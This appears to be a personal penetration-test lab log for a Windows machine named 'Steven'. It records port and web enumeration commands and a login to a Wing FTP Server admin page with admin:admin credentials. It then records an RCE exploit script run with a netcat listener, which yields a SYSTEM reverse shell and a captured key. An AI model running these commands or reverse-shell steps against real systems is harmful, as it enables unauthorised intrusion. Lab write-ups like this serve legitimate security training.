Steven
๐งช Pentest Log: {{date:2025-08-28}}
๐ Target Information
- Machine Name: Steven
- IP Address: 10.11.1.36
- Operating System: Windows
ip=10.11.1.36
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 81
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Port 5466
Login with weak credential
admin:admin
Google "Wing FTP Server ยฉ2003-2014 exploit", found
https://www.exploit-db.com/exploits/34517
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 5466
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
Change the timeout time to 5
r = requests.post(url, headers=headers, data=finalload, timeout=5)
Exploit
nc -lvnp 5466
python3 50720.py $ip 5466 172.16.1.1 5466 admin admin
๐งฌ Privilege Escalation
๐ค Current Access
- User: nt authority\system
- Groups: N/A
- Shell Type: reverse shell
๐ Enumeration
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Key File
t70m5jaco2zy9vhqlb6s